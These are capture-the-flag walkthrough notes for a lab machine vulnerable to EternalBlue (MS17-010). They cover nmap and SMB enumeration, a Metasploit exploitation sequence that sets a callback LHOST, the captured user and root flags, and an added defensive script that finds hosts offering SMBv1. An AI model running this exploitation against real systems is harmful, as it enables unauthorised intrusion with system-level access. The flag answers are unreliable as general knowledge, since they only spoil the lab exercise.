Nmap

sudo nmap -A -p- 10.10.10.40 

Port 445 (SMB)

smbclient --no-pass -L //10.10.10.40

sudo nmap --script smb-* -p 445 10.10.10.40

sudo nmap --script smb-protocols -p 445 10.10.10.40

The victim appears vulnerable to EternalBlue (MS17-010).
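The smb-protocols scan above is also useful from the defender's side: a host that still offers the SMBv1 dialect (NT LM 0.12) exposes the protocol MS17-010 lives in. The following is an added example, not part of the original notes, that parses smb-protocols output and lists hosts still offering SMBv1. The sample output is constructed (the second host, 192.0.2.10, is hypothetical), and offering SMBv1 does not by itself prove the host is unpatched.

```python
import re

# Constructed sample of `nmap --script smb-protocols -p 445` output.
# Not the captured output from this box; 192.0.2.10 is a hypothetical host.
SAMPLE = """\
Nmap scan report for 10.10.10.40
Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|_    2.10

Nmap scan report for 192.0.2.10
Host script results:
| smb-protocols:
|   dialects:
|     2.02
|     3.00
|_    3.11
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
DIALECT_RE = re.compile(r"^\|[ _]\s{3,}(\S.*?)\s*$")

def parse_dialects(text):
    """Return {host: [dialect, ...]} from smb-protocols script output."""
    hosts, host, in_dialects = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:  # new host section starts
            host, in_dialects = m.group(1), False
            hosts[host] = []
        elif host and line.strip() == "|   dialects:":
            in_dialects = True
        elif in_dialects and (d := DIALECT_RE.match(line)):
            hosts[host].append(d.group(1))
        else:  # any other line ends the dialect list
            in_dialects = False
    return hosts

def smbv1_hosts(text):
    """Hosts whose dialect list includes SMBv1 (NT LM 0.12)."""
    return sorted(h for h, ds in parse_dialects(text).items()
                  if any(d.startswith("NT LM 0.12") for d in ds))

if __name__ == "__main__":
    for h in smbv1_hosts(SAMPLE):
        print(f"{h}: SMBv1 offered; disable it and confirm MS17-010 is patched")
```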

Local Exploit

Metasploit

msfconsole -q
search eternal
use 1

options
set RHOSTS 10.10.10.40
set LHOST 10.10.14.12
run

user.txt

dc32b7bfefa8ae6f1d1fc594c9133e80

root.txt

We were nt authority\system, so we could also access the Administrator’s desktop.

aac84c29ac1b9a3b466c54e780ca8b93

Manual

https://github.com/worawit/MS17-010